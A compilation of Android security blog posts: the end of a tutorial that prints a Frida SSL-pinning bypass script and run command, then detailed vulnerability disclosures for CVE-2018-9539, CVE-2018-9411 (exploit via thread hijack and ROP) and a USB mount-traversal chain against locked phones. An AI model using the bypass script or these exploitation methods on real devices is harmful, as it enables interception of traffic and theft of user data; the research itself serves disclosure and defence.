The quickiest way to setup a connection between our devices is get connected the android device and computer in the same wifi, so we just need to set up the android wifi connection to manual proxy in advanced section and also set up Burpsuite with the local computer ip (don’t forget use the same port) 

also we need to install the burpsuite certificate, once the android device have the proxy set up we need to access to http://burp in browser, then click the “CA certificate” buton and download the certificate (Note, you need to change the certificate extention from der to cer)

Last step: Bypass SSL pinning with Universal Android SSL Pinning Bypass No.2 

So, we got frida, frida-server and burpsuite running as espected, the next step is run the “Universal Android SSL Pinning Bypass No.2” script in order to start sniffing the application connections so we need to get the script and saved locally as name_script.js, here is a blogpost about this script by Mattia Vinci (you can add several scripts to frida from the repo or custom scripts too)

  • /*
  • Universal Android SSL Pinning Bypass
  • by Mattia Vinci and Maurizio Agazzini
  • $ frida -U -f org.package.name -l universal-ssl-check-bypass.js —no-pause
  • https://techblog.mediaservice.net/2018/11/universal-android-ssl-check-bypass-2/
  • */
  • Java.perform(function() {
  • var array_list = Java.use(«java.util.ArrayList»);
  • var ApiClient = Java.use(‘com.android.org.conscrypt.TrustManagerImpl’);
  • ApiClient.checkTrustedRecursive.implementation = function(a1, a2, a3, a4, a5, a6) {
  • // console.log(‘Bypassing SSL Pinning’);
  • var k = array_list.$new();
  • return k;
  • }
  • }, 0);

so the only thing that we have to do is save this script as “frida-ssl-2.js” and run the following command:

  • # the -l flag is to run custom script, in this case ssl pinning 2 script
  • # the -f flag is for the apk package name, —no-paus option to not interrupt
  • # the app startup at all and still leave the spawning of the process to Frida.
  • frida -U -l frida-ssl-2.js —no-paus -f com.example.application

then the application is going start you are going to see the results in burpsuite

so at this point you successfully bypass the ssl pinning with frida and you can start hacking network connections on android aplications

References:

well that’s it , if you have any thoughts, doubts, comment or sugestion just drop me a line here or in twitter @omespino, read you later.

CVE-2018-9539: Use-after-free vulnerability in privileged Android service

( Original text by Tamir Zahavi-Brunner )

As part of our platform research in Zimperium zLabs, I have recently discovered a vulnerability in a privileged Android service called MediaCasService and reported it to Google. Google designated it as CVE-2018-9539 and patched it in the November security update (2018-11-01 patch level).

In this blog post, I will describe the technical details of this use-after-free vulnerability, along with some background information and the details of the proof-of-concept I wrote that triggers it. Link to the full proof-of-concept is available at the end of the blog post.

MediaCasService

The Android service called MediaCasService (AKA android.hardware.cas) allows apps to descramble protected media streams. The communication between apps and MediaCasService is performed mostly through two interfaces/objects: Cas, which manages the keys (reference: MediaCas Java API), and Descrambler, which performs the actual descramble operation (reference: MediaDescrambler Java API).

Underneath the MediaCasService API, the actual operations are performed by a plugin, which is a library that the service loads. In our case, the relevant plugin is the ClearKey plugin, whose library is libclearkeycasplugin.so.

In order to descramble data, apps need to use both the Cas object and the Descrambler object. The Descrambler object is used for the actual descramble operation, but in order to do that, it needs to be linked to a session with a key. In order to manage sessions and add keys to them, the Cas object is used.

Internally, the ClearKey plugin manages sessions in the ClearKeySessionLibrary, which is essentially a hash table. The keys are session IDs, while the values are the session objects themselves. Apps receive the session IDs which they can use to refer to the session objects in the service.

After creating a session and attaching a key to it, apps are in charge of linking it to a Descrambler object. The descrambler object has a member called mCASSession, which is a reference to its session object and is used in descramble operations. While there is no obligation to do so, once a Descrambler session is linked with a session object, an app can remove that session from the session library. In that case, the only reference to the session object will be through the Descrambler’s mCASSession.

An important note is that references to session objects are held through strong pointers (sp class). Hence, each session object has a reference count, and once that reference count reaches zero the session object is released. References are either through the session library or through a Descrambler’s mCASSession.

The vulnerability

Let’s take a look at ClearKey’s descramble method:

Snippet from frameworks/av/drm/mediacas/plugins/clearkey/ClearKeyCasPlugin.cpp (source)

 

As you can see, the session object referenced by mCASSession is used here in order to decrypt, but its reference count does not increase while it is being used. This means that it is possible for the decrypt function to run with a session object which was released, as its reference count was decreased to zero.

This allows an attacker to cause a use-after-free (the session object will be used after it was freed) through a race condition. Before running descramble, the attacker would remove the reference to the session object from the session library, leaving the Descrambler’s mCASSession as the only reference to the session. Then, the attacker would run descramble at the same time as setting the session of the Descrambler to another session, which can cause a race condition. Setting a different session for the Descrambler would release the original session object (its reference count would drop to zero); if this happens in the middle of mCASSession->decrypt, then decrypt would be using a freed session object.

Proof of concept

Before going into the details of the PoC, there is one note about its effect.

In this PoC, nothing gets allocated instead of the released session object; we just let the decrypt function use a freed object. One of the members of the session object that decrypt uses is a mKeyLock, which is essentially a mutex that decrypt attempts to lock:

Snippet from frameworks/av/drm/mediacas/plugins/clearkey/ClearKeyCasPlugin.cpp (source)

 

As you can expect, when a session object is released, the mutex of its mKeyLock is destroyed. Therefore, when the use-after-free is triggered, decrypt attempts to use an already destroyed mutex.

Interestingly, this is where a recent change comes into place. Up until Android 8.1, attempting to use a destroyed mutex would return an error, which in this case would simply be ignored. Since Android 9, attempting to use a destroyed mutex results in an abort, which crashes the process:

Snippet from bionic/libc/bionic/pthread_mutex.cpp (source)

 

This means that while the PoC should always cause a use-after-free, only Android 9 has a way to detect whether it worked or not. In older versions, there is no noticeable effect. Therefore, the PoC is mainly intended to run on Android 9.

After covering the effect of the PoC, here is a high-level overview of the actions it performs:

  1. Initialize Cas and Descrambler objects.
  2. Use the Cas object in order to create two sessions: session1 and session2. Both of them will be referenced from the session library.
  3. Link session1 to the Descrambler object, and then use the Cas object in order to remove it from the session library. Now, session1 only has a reference from the Descrambler object; its reference count is one.
  4. At the same time:
    • Run multiple threads which perform descramble through the Descrambler object.
    • Set the session of the Descrambler object to session2.
  5. If running descramble in one of the threads did not return, it means that the PoC was successful and the service crashed. If not, retry again from step 2.

Full source code for the PoC is available on GitHub .

Timeline

  • 08.2018 – Vulnerability discovered
  • 08.2018 – Vulnerability details + PoC sent to Google
  • 11.2018 – Google distributed patches

If you have any questions, you are welcome to DM me on Twitter (@tamir_zb).

 

CVE-2018-9411: New critical vulnerability in multiple high-privileged Android services

( Original text by Tamir Zahavi-Brunner )

Картинки по запросу android

As part of our platform research in Zimperium zLabs, I have recently discloseda a critical vulnerability affecting multiple high-privileged Android services to Google. Google designated it as CVE-2018-9411 and patched it in the July security update (2018-07-01 patch level), including additional patches in the September security update (2018-09-01 patch level).

I also wrote a proof-of-concept exploit for this vulnerability, demonstrating how it can be used in order to elevate permissions from the context of a regular unprivileged app.

In this blog post, I will cover the technical details of the vulnerability and the exploit. I will start by explaining some background information related to the vulnerability, followed by the details of the vulnerability itself. I will then describe why I chose a particular service as the target for the exploit over other services that are affected by the vulnerability. I will also analyze the service itself in relation to the vulnerability. Lastly, I will cover the details of the exploit I wrote.

Project Treble

Project Treble introduces plenty of changes to how Android operates internally. One massive change is the split of many system services. Previously, services contained both AOSP (Android Open Source Project) and vendor code. After Project Treble, these services were all split into one AOSP service and one or more vendor services, called HAL services. For more background information, the separation between services is described more thoroughly in my BSidesLV talk and in my previous blog post.

HIDL

The separation of Project Treble introduces an increment in the overall number of IPC (inter-process communication); data which was previously passed in the same process between AOSP and vendor code must now pass through IPC between AOSP and HAL services. As most IPC in Android goes through Binder, Google decided that the new IPC should do so as well.

But simply using the existing Binder code was not enough, Google also decided to perform some modifications. First, they introduced multiple Binder domains in order to separate between this new type of IPC and others. More importantly, they introduced HIDL – a whole new format for the data passed through Binder IPC. This new format is supported by a new set of libraries, and is dedicated to the new Binder domain for IPC between AOSP and HAL services. Other Binder domains still use the old format.

The operation of the new HIDL format compared to the old one is a bit like layers. The underlying layer in both cases is the Binder kernel driver, but the top layer is different. For communication between HAL and AOSP services, the new set of libraries is used; for other types of communication, the old set of libraries is used. Both sets of libraries contain very similar code, to the point that some of the original code was even copied to the new HIDL libraries (although personally I could not find a good reason for copy-pasting code here, which is generally not a good practice). The usage of each of these libraries is not exactly the same (you cannot simply substitute one with another), but it is still very similar.

Both sets of libraries represent data that transfers in Binder transactions as C++ objects. This means that HIDL introduces its own new implementation for many types of objects, from relatively simple ones like objects that represent strings to more complex implementations like file descriptors or references to other services.

Sharing memory

One important aspect of Binder IPC is the use of shared memory. In order to maintain simplicity and good performance, Binder limits each transaction to a maximum size of 1MB. For situations where processes wish to share larger amounts of data between each other through Binder, shared memory is used.

In order to share memory through Binder, processes utilize Binder’s feature of sharing file descriptors. The fact that file descriptors can be mapped to memory using mmap allows multiple processes to share the same memory region by sharing a file descriptor. One issue here with regular Linux (non-Android) is that file descriptors are normally backed by files; what if processes want to share anonymous memory regions? For that reason, Android has ashmem, which allows processes to allocate memory to back file descriptors without an actual file involved.

Sharing memory through Binder is an example of different implementations between HIDL and the old set of libraries. In both cases the eventual actions are the same: one process maps an ashmem file descriptor in its memory space, transfers that file descriptor to another process through Binder and then that other process maps it in its own memory space. But the implementations for the objects which handle this are different.

In HIDL’s case, an important object for sharing memory is hidl_memory. As described in the source code: “hidl_memory is a structure that can be used to transfer pieces of shared memory between processes”.

The vulnerability

Let’s take a closer look at hidl_memory by looking at its members:

Snippet from system/libhidl/base/include/hidl/HidlSupport.h (source)
  • mHandle – a handle, which is a HIDL object that holds file descriptors (only one file descriptor in this case).
  • mSize – the size of the memory to be shared.
  • mName – supposed to represent the type of memory, but only the ashmem type is really relevant here.

When transferring structures like this through Binder in HIDL, complex objects (like hidl_handle or hidl_string) have their own custom code for writing and reading the data, while simple types (like integers) are transferred “as is”. This means that the size is transferred as a 64 bit integer. On the other hand, in the old set of libraries, a 32 bit integer is used.

This seems rather strange, why should the size of the memory be 64 bit? First of all, why not do the same as in the old set of libraries? But more importantly, how would a 32 bit process handle this? Let’s check this by taking a look at the code which maps a hidl_memory object (for the ashmem type):

Snippet from system/libhidl/transport/memory/1.0/default/AshmemMapper.cpp (source)

Interesting! Nothing about 32 bit processes, and not even a mention that the size is 64 bit.

So what happens here? The type of the length field in mmap’s signature is size_t, which means that its bitness matches the bitness of the process. In 64 bit processes there are no issues, everything is simply 64 bit. In 32 bit processes on the other hand, the size is truncated to 32 bit, so only the lower 32 bits are used.

This means that if a 32 bit process receives a hidl_memory whose size is bigger than UINT32_MAX (0xFFFFFFFF), the actual mapped memory region will be much smaller. For instance, for a hidl_memory with a size of 0x100001000, the size of the memory region will only be 0x1000. In this scenario, if the 32 bit process performs bounds checks based on the hidl_memory size, they will hopelessly fail, as they will falsely indicate that the memory region spans over more than the entire memory space. This is the vulnerability!

Finding a target

We have a vulnerability; let’s now try to find a target. We are looking for a HAL service which meets the following criteria:

  1. Compiles to 32 bit.
  2. Receives shared memory as input.
  3. When performing bounds check on the shared memory, does not truncate the size as well. For example, the following code is not vulnerable, as it performs bounds check on a truncated size_t:

These are the essential requirements for this vulnerability, but there are some more optional ones which I think make for a more interesting target:

  1. Has a default implementation in AOSP. While ultimately vendors are in charge of all HAL services, AOSP does contain default implementations for some, which vendors can use. I found that in many cases when such implementation exists, vendors are reluctant to modify it and end up simply using it as is. This makes such a target more interesting, as it can be relevant in multiple vendor, as opposed to a vendor-specific service.

One thing you should note is that even though HAL services are supposed to only be accessible by other system services, this is not really the truth. There are a select few HAL services which are in fact accessible by regular unprivileged apps, each for its own reason. Therefore, the last requirement for the target is:

  1. Directly accessible from an unprivileged app. Otherwise this makes everything a bit hypothetical, as we will be talking about a target which is only accessible in case you already compromise another service.

Luckily, there is one HAL service which meets all these requirements: android.hardware.cas, AKA MediaCasService.

CAS

CAS stands for Conditional Access System. CAS in itself is mostly out of the scope of this blog post, but in general, it is similar to DRM (so much so that the differences are not always clear). Simplistically, it functions in the same way as DRM – there is encrypted data which needs to be decrypted.

MediaCasService

First and foremost, MediaCasService indeed allows apps to decrypt encrypted data. If you read my previous blog post, which dealt with a vulnerability in a service called MediaDrmServer, you might notice that there is a reason for the comparison with DRM. MediaCasService is extremely similar to MediaDrmServer (the service in charge of decrypting DRM media), from its API to the way it operates internally.

A slight change from MediaDrmServer is the terminology: instead of decrypt, the API is called descramble (although they do end up calling it decrypt internally as well).

Let’s take a look at how the descramble method operates (note that I am omitting some minor parts here in order to simplify things):

Unsurprisingly, data is shared over shared memory. There is a buffer indicating where the relevant part of the shared memory is (called srcBuffer, but is relevant for both source and destination). On this buffer, there are offsets to where the service reads the source data from and where it writes the destination data to. It is possible to indicate that the source data is in fact clear and not encrypted, in which case the service will simply copy data from source to destination without modifying it.

This looks great for the vulnerability! At least if the service only uses the hidl_memory size in order to verify that it all fits inside the shared memory, and not other parameters. In that case, by letting the service believe that our small memory region spans over its entire memory space, we could circumvent the bounds checks and put the source and destination offsets anywhere we like. This should give us full read+write access to the service memory, as we could read from anywhere to our shared memory and write from our shared memory to anywhere. Note that negative offsets should also work here, as even 0xFFFFFFFF (-1) would be less than the hidl_memory size.

Let’s verify that this is indeed the case by looking at descramble’s code. Quick note: the function validateRangeForSize simply checks that “first_param + second_param <= third_param” while minding possible overflows.

Snippet from hardware/interfaces/cas/1.0/default/DescramblerImpl.cpp (source)

As you can see, the code checks that srcBuffer lies inside the shared memory based on the hidl_memory size. After this the hidl_memory is not used anymore and the rest of the checks are performed against srcBuffer itself. Perfect! All we need then in order to achieve full read+write access is to use the vulnerability and then set srcBuffer’s size to more than 0xFFFFFFFF. This way, any value for the source and destination offsets would be valid.


Using the vulnerability for out-of-bounds read

 


Using the vulnerability for out-of-bounds write

The TEE device

Before writing an exploit using this (very good) primitive, let’s think about what we really want this exploit to achieve. A look at the SELinux rules for this service shows that it is in fact heavily restricted and does not have a lot of permissions. Still, it has one interesting permission that a regular unprivileged app does not have: access to the TEE (Trusted Execution Environment) device.

This permission is extremely interesting as it lets an attacker access a wide variety of things: different device drivers for different vendors, different TrustZone operating systems and a large amount of trustlets. In my previous blog post, I have already discussed how dangerous this permission can be.

While there are indeed many things you can do with access to the TEE device, at this point I merely wanted to prove that I could get this access. Hence, my objective was to perform a simple operation which requires access to the TEE device. In the Qualcomm TEE device driver, there is a fairly simple ioctl which queries for the version of the QSEOS running on the device. Therefore, my target when building the exploit for MediaCasService was to run this ioctl and get its result.

The exploit

Note: My exploit is for a specific device and build – Pixel 2 with the May 2018 security update (build fingerprint: “google/walleye/walleye:8.1.0/OPM2.171019.029.B1/4720900:user/release-keys”). A link to the full exploit code is available at the end of the blog post.

So far we have full read+write over the target process memory. While this is a great primitive, there are two issues that need to be solved:

  • ASLR – while we do have full read access, it is only relative to where our shared memory was mapped; we do not know where it is compared to other data in memory. Ideally, we would like to find the address of the shared memory as well as addresses of other interesting data.
  • For each execution of the vulnerability, the shared memory gets mapped and then unmapped after the operation. There is no guarantee that the shared memory will get mapped in the same location each time; it is entirely possible that another memory region will take its place between executions.

Let’s take a look at some of the memory maps of the linker in the service memory space for this specific build:

As you can see, the linker happens to create a small gap of 2 memory pages (0x2000) between linker_alloc_small_objects and linker_alloc. The addresses for these memory maps are relatively high; all libraries loaded by this process are mapped to lower addresses. This means that this gap is the highest gap in memory. Since mmap’s behavior is to try to map to high addresses before low addresses, any attempt to map a memory region of 2 pages or less should be mapped in this gap. Luckily, the service does not normally map anything so small, which means that this gap should stay there. This solves our second issue, as this is a deterministic location in memory where our shared memory will always be mapped.

Let’s look at the data in the linker_alloc straight after the gap:

The linker data in here happens to be extremely helpful for us; it contains addresses which can easily indicate the address of the linker_alloc memory region. Since the vulnerability gives us relative read, and we already concluded that our shared memory will be mapped straight before this linker_alloc, we can use it in order to determine the address of the shared memory. If we take the address at offset 0x40 and reduce it by 0x10, we get the linker_alloc address. Reducing it by the size of the shared memory itself will result in the shared memory address.

So far we solved the second issue, but have only partially solved the first issue. We do have the address of our shared memory, but not of other interesting data. But what other data are we interested in?

Hijacking a thread

One part of the MediaCasService API is the ability for clients to provide listeners to events. If a client provides a listener, it will be notified when different CAS events occur. A client can also trigger events by its own, which will then be sent back to the listener. The way this works through Binder and HIDL is that when the service sends an event to the listener, it will wait until the listener finished processing the event; a thread will be blocked waiting for the listener.

Flow of triggering an event

This is great for us; we can cause a thread in the service to be blocked waiting for us, in a known pre-determined thread. Once we have a thread in this state, we can modify its stack in order to hijack it; then only after we finish, we can resume the thread by finishing to process the event. But how do we find the thread stack in memory?

As our deterministic shared memory address is so high, the distance between that address and possible locations of the blocked thread stack is big. The effect of ASLR makes it too unreliable to try to find the thread stack relatively from our deterministic address, so we use another approach. We try to use a bigger shared memory and have it mapped before the blocked thread stack, so we will be able to reach it relatively through the vulnerability.

Instead of only getting one thread to that blocked state, we get multiple (5) threads. This causes more threads to be created, with more thread stacks allocated. By doing this, if there are a few thread-stack-sized gaps in memory, they should be filled, and at least one thread stack in a blocked thread should be mapped at a low address, without any library mapped before it (remember, mmap’s behavior is to map regions at high addresses before low addresses). Then, ideally, if we use a large shared memory, it should be mapped before that.

MediaCasService memory map after filling gaps and mapping our shared memory

One drawback is that there is a chance that other unexpected things (like jemalloc heap) will get mapped in the middle, so the blocked thread stack won’t be where we expect it to be. There could be multiple approaches to solve this. I decided to simply crash the service (using the vulnerability in order to write to an unmapped address) and try again, as every time the service crashes it simply restarts. In any case, this scenario normally does not happen, and even when it does, one retry is usually enough.

Once our shared memory is mapped before the blocked thread stack, we use the vulnerability to read two things from the thread stack:

  • The thread stack address, using pthread metadata which lies in the same memory region after the stack itself.
  • The address where libc is mapped at in order to later build a ROP chain using both gadgets and symbols in libc (libc has enough gadgets). We do this by reading a return address to a specific point in libc, which is in the thread stack.

Data read from thread stack

From now on, we can read and write to the thread stack using the vulnerability. We have both the address of the deterministic shared memory location and the address of the thread stack, so by using the difference between the addresses we can reach the thread stack from our shared memory (the small one with deterministic location).

ROP chain

We have full access to a blocked thread stack which we can resume, so the next step is to execute a ROP chain. We know exactly which part of the stack to overwrite with our ROP chain, as we know the exact state that the thread is blocked at. After overwriting part of the stack, we can resume the thread so the ROP chain is executed.

Unfortunately, the SELinux limitations on this process prevent us from turning this ROP chain into full arbitrary code execution. There is no execmem permission, so anonymous memory cannot be mapped as executable, and we have no control over file types which can be mapped as executable. In this case, the objective is pretty simple (running a single ioctl), so I simply wrote a ROP chain which does this. In theory, if you want to perform more complex stuff, the primitive is so strong that it should still be possible. For instance, if you want to perform complex logic based on a result of a function, you could perform multi-stage ROP: perform one ROP chain which runs that function and writes its result somewhere, read that result, perform the complex logic in your own process and then run another ROP chain based on that.

As was previously mentioned, the objective is to obtain the QSEOS version. Here is the code that is essentially performed by the ROP chain in order to do that:

stack_addr is the address of the memory region of the stack, which is simply an address that we know is writable and will not be overwritten (the stack begins from the bottom and is not close to the top), so we can write the result to that address and then read it using the vulnerability. The sleep at the end is so the thread will not crash immediately after running the ROP chain, so we can read the result.

Building the ROP chain itself is pretty straightforward. There are enough gadgets in libc to perform it and all the symbols are in libc as well, and we already have libc’s address.

After we are done, the process is left in a bit of an unstable state, as we hijacked a thread to execute our ROP chain. In order to leave everything in a clean state, we simply crash the service using the vulnerability (by writing to an unmapped address) in order to let it restart.

Takeaways

As I previously discussed in my BSidesLV talk and in my previous blog post, Google claims that Project Treble benefits Android security. While that is true in many cases, this vulnerability is another example of how elements of Project Treble could lead to the opposite. This vulnerability is in a library introduced specifically as part of Project Treble, and does not exist in a previous library which does pretty much the same thing. This time, the vulnerability is in a commonly used library, so it affects many high-privileged services.

Full exploit code is available on GitHub. Note: the exploit is only provided for educational or defensive purposes; it is not intended for any malicious or offensive use.

Timeline

 

I would like to thank Google for their quick and professional response, Adam Donenfeld (@doadam), Ori Karliner (@oriHCX), Rani Idan (@raniXCH), Ziggy (@z4ziggy) and the rest of the Zimperium zLabs team.

If you have any questions, you are welcome to DM me on Twitter (@tamir_zb).

OATmeal on the Universal Cereal Bus: Exploiting Android phones over USB

( origin  by Jann Horn, Google Project Zero )

Recently, there has been some attention around the topic of physical attacks on smartphones, where an attacker with the ability to connect USB devices to a locked phone attempts to gain access to the data stored on the device. This blogpost describes how such an attack could have been performed against Android devices (tested with a Pixel 2).

 

After an Android phone has been unlocked once on boot (on newer devices, using the «Unlock for all features and data» screen; on older devices, using the «To start Android, enter your password» screen), it retains the encryption keys used to decrypt files in kernel memory even when the screen is locked, and the encrypted filesystem areas or partition(s) stay accessible. Therefore, an attacker who gains the ability to execute code on a locked device in a sufficiently privileged context can not only backdoor the device, but can also directly access user data.
(Caveat: We have not looked into what happens to work profile data when a user who has a work profile toggles off the work profile.)

 

The bug reports referenced in this blogpost, and the corresponding proof-of-concept code, are available at:
https://bugs.chromium.org/p/project-zero/issues/detail?id=1583 («directory traversal over USB via injection in blkid output»)
https://bugs.chromium.org/p/project-zero/issues/detail?id=1590 («privesc zygote->init; chain from USB»)

 

These issues were fixed as CVE-2018-9445 (fixed at patch level 2018-08-01) and CVE-2018-9488 (fixed at patch level 2018-09-01).

The attack surface

Many Android phones support USB host mode (often using OTG adapters). This allows phones to connect to many types of USB devices (this list isn’t necessarily complete):

 

  • USB sticks: When a USB stick is inserted into an Android phone, the user can copy files between the system and the USB stick. Even if the device is locked, Android versions before P will still attempt to mount the USB stick. (Android 9, which was released after these issues were reported, has logic in vold that blocks mounting USB sticks while the device is locked.)
  • USB keyboards and mice: Android supports using external input devices instead of using the touchscreen. This also works on the lockscreen (e.g. for entering the PIN).
  • USB ethernet adapters: When a USB ethernet adapter is connected to an Android phone, the phone will attempt to connect to a wired network, using DHCP to obtain an IP address. This also works if the phone is locked.

 

This blogpost focuses on USB sticks. Mounting an untrusted USB stick offers nontrivial attack surface in highly privileged system components: The kernel has to talk to the USB mass storage device using a protocol that includes a subset of SCSI, parse its partition table, and interpret partition contents using the kernel’s filesystem implementation; userspace code has to identify the filesystem type and instruct the kernel to mount the device to some location. On Android, the userspace implementation for this is mostly in vold(one of the processes that are considered to have kernel-equivalent privileges), which uses separate processes in restrictive SELinux domains to e.g. determine the filesystem types of partitions on USB sticks.

 

The bug (part 1): Determining partition attributes

When a USB stick has been inserted and vold has determined the list of partitions on the device, it attempts to identify three attributes of each partition: Label (a user-readable string describing the partition), UUID (a unique identifier that can be used to determine whether the USB stick is one that has been inserted into the device before), and filesystem type. In the modern GPT partitioning scheme, these attributes can mostly be stored in the partition table itself; however, USB sticks tend to use the MBR partition scheme instead, which can not store UUIDs and labels. For normal USB sticks, Android supports both the MBR partition scheme and the GPT partition scheme.

 

To provide the ability to label partitions and assign UUIDs to them even when the MBR partition scheme is used, filesystems implement a hack: The filesystem header contains fields for these attributes, allowing an implementation that has already determined the filesystem type and knows the filesystem header layout of the specific filesystem to extract this information in a filesystem-specific manner. When vold wants to determine label, UUID and filesystem type, it invokes /system/bin/blkid in the blkid_untrusted SELinux domain, which does exactly this: First, it attempts to identify the filesystem type using magic numbers and (failing that) some heuristics, and then, it extracts the label and UUID. It prints the results to stdout in the following format:

 

/dev/block/sda1: LABEL=»<label>» UUID=»<uuid>» TYPE=»<type>»

 

However, the version of blkid used by Android did not escape the label string, and the code responsible for parsing blkid’s output only scanned for the first occurrences of UUID=» and TYPE=». Therefore, by creating a partition with a crafted label, it was possible to gain control over the UUID and type strings returned to vold, which would otherwise always be a valid UUID string and one of a fixed set of type strings.

The bug (part 2): Mounting the filesystem

When vold has determined that a newly inserted USB stick with an MBR partition table contains a partition of type vfat that the kernel’s vfat filesystem implementation should be able to mount,PublicVolume::doMount() constructs a mount path based on the filesystem UUID, then attempts to ensure that the mountpoint directory exists and has appropriate ownership and mode, and then attempts to mount over that directory:

 

   if (mFsType != «vfat») {
       LOG(ERROR) << getId() << » unsupported filesystem » << mFsType;
       return -EIO;
   }
   if (vfat::Check(mDevPath)) {
       LOG(ERROR) << getId() << » failed filesystem check»;
       return -EIO;
   }
   // Use UUID as stable name, if available
   std::string stableName = getId();
   if (!mFsUuid.empty()) {
       stableName = mFsUuid;
   }
   mRawPath = StringPrintf(«/mnt/media_rw/%s», stableName.c_str());
   […]
   if (fs_prepare_dir(mRawPath.c_str(), 0700, AID_ROOT, AID_ROOT)) {
       PLOG(ERROR) << getId() << » failed to create mount points»;
       return -errno;
   }
   if (vfat::Mount(mDevPath, mRawPath, false, false, false,
           AID_MEDIA_RW, AID_MEDIA_RW, 0007, true)) {
       PLOG(ERROR) << getId() << » failed to mount » << mDevPath;
       return -EIO;
   }

 

The mount path is determined using a format string, without any sanity checks on the UUID string that was provided by blkid. Therefore, an attacker with control over the UUID string can perform a directory traversal attack and cause the FAT filesystem to be mounted outside of /mnt/media_rw.

 

This means that if an attacker inserts a USB stick with a FAT filesystem whose label string is ‘UUID=»../##’ into a locked phone, the phone will mount that USB stick to /mnt/##.

 

However, this straightforward implementation of the attack has several severe limitations; some of them can be overcome, others worked around:

 

  • Label string length: A FAT filesystem label is limited to 11 bytes. An attacker attempting to perform a straightforward attack needs to use the six bytes ‘UUID=»‘ to start the injection, which leaves only five characters for the directory traversal — insufficient to reach any interesting point in the mount hierarchy. The next section describes how to work around that.
  • SELinux restrictions on mountpoints: Even though vold is considered to be kernel-equivalent, a SELinux policy applies some restrictions on what vold can do. Specifically, the mountonpermission is restricted to a set of permitted labels.
  • Writability requirement: fs_prepare_dir() fails if the target directory is not mode 0700 and chmod() fails.
  • Restrictions on access to vfat filesystems: When a vfat filesystem is mounted, all of its files are labeled as u:object_r:vfat:s0. Even if the filesystem is mounted in a place from which important code or data is loaded, many SELinux contexts won’t be permitted to actually interact with the filesystem — for example, the zygote and system_server aren’t allowed to do so. On top of that, processes that don’t have sufficient privileges to bypass DAC checks also need to be in the media_rw group. The section «Dealing with SELinux: Triggering the bug twice» describes how these restrictions can be avoided in the context of this specific bug.

Exploitation: Chameleonic USB mass storage

As described in the previous section, a FAT filesystem label is limited to 11 bytes. blkid supports a range of other filesystem types that have significantly longer label strings, but if you used such a filesystem type, you’d then have to make it past the fsck check for vfat filesystems and the filesystem header checks performed by the kernel when mounting a vfat filesystem. The vfat kernel filesystem doesn’t require a fixed magic value right at the start of the partition, so this might theoretically work somehow; however, because several of the values in a FAT filesystem header are actually important for the kernel, and at the same time,blkid also performs some sanity checks on superblocks, the PoC takes a different route.

 

After blkid has read parts of the filesystem and used them to determine the filesystem’s type, label and UUID, fsck_msdos and the in-kernel filesystem implementation will re-read the same data, and those repeated reads actually go through to the storage device. The Linux kernel caches block device pages when userspace directly interacts with block devices, but __blkdev_put() removes all cached data associated with a block device when the last open file referencing the device is closed.

 

A physical attacker can abuse this by attaching a fake storage device that returns different data for multiple reads from the same location. This allows us to present, for example, a romfs header with a long label string to blkid while presenting a perfectly normal vfat filesystem to fsck_msdos and the in-kernel filesystem implementation.

 

This is relatively simple to implement in practice thanks to Linux’ built-in support for device-side USB.Andrzej Pietrasiewicz’s talk «Make your own USB gadget» is a useful introduction to this topic. Basically, the kernel ships with implementations for device-side USB mass storage, HID devices, ethernet adapters, and more; using a relatively simple pseudo-filesystem-based configuration interface, you can configure a composite gadget that provides one or multiple of these functions, potentially with multiple instances, to the connected device. The hardware you need is a system that runs Linux and supports device-side USB; for testing this attack, a Raspberry Pi Zero W was used.

 

The f_mass_storage gadget function is designed to use a normal file as backing storage; to be able to interactively respond to requests from the Android phone, a FUSE filesystem is used as backing storage instead, using the direct_io option / the FOPEN_DIRECT_IO flag to ensure that our own kernel doesn’t add unwanted caching.

 

At this point, it is already possible to implement an attack that can steal, for example, photos stored on external storage. Luckily for an attacker, immediately after a USB stick has been mounted,com.android.externalstorage/.MountReceiver is launched, which is a process whose SELinux domain permits access to USB devices. So after a malicious FAT partition has been mounted over /data (using the label string ‘UUID=»../../data’), the zygote forks off a child with appropriate SELinux context and group membership to permit accesses to USB devices. This child then loads bytecode from /data/dalvik-cache/, permitting us to take control over com.android.externalstorage, which has the necessary privileges to exfiltrate external storage contents.

 

However, for an attacker who wants to access not just photos, but things like chat logs or authentication credentials stored on the device, this level of access should normally not be sufficient on its own.

Dealing with SELinux: Triggering the bug twice

The major limiting factor at this point is that, even though it is possible to mount over /data, a lot of the highly-privileged code running on the device is not permitted to access the mounted filesystem. However, one highly-privileged service does have access to it: vold.

 

vold actually supports two types of USB sticks, PublicVolume and PrivateVolume. Up to this point, this blogpost focused on PublicVolume; from here on, PrivateVolume becomes important.
A PrivateVolume is a USB stick that must be formatted using a GUID Partition Table. It must contain a partition that has type UUID kGptAndroidExpand (193D1EA4-B3CA-11E4-B075-10604B889DCF), which contains a dm-crypt-encrypted ext4 (or f2fs) filesystem. The corresponding key is stored at/data/misc/vold/expand_{partGuid}.key, where {partGuid} is the partition GUID from the GPT table as a normalized lowercase hexstring.

 

As an attacker, it normally shouldn’t be possible to mount an ext4 filesystem this way because phones aren’t usually set up with any such keys; and even if there is such a key, you’d still have to know what the correct partition GUID is and what the key is. However, we can mount a vfat filesystem over /data/misc and put our own key there, for our own GUID. Then, while the first malicious USB mass storage device is still connected, we can connect a second one that is mounted as PrivateVolume using the keys vold will read from the first USB mass storage device. (Technically, the ordering in the last sentence isn’t entirely correct — actually, the exploit provides both mass storage devices as a single composite device at the same time, but stalls the first read from the second mass storage device to create the desired ordering.)

 

Because PrivateVolume instances use ext4, we can control DAC ownership and permissions on the filesystem; and thanks to the way a PrivateVolume is integrated into the system, we can even control SELinux labels on that filesystem.

 

In summary, at this point, we can mount a controlled filesystem over /data, with arbitrary file permissions and arbitrary SELinux contexts. Because we control file permissions and SELinux contexts, we can allow any process to access files on our filesystem — including mapping them with PROT_EXEC.

Injecting into zygote

The zygote process is relatively powerful, even though it is not listed as part of the TCB. By design, it runs with UID 0, can arbitrarily change its UID, and can perform dynamic SELinux transitions into the SELinux contexts of system_server and normal apps. In other words, the zygote has access to almost all user data on the device.

 

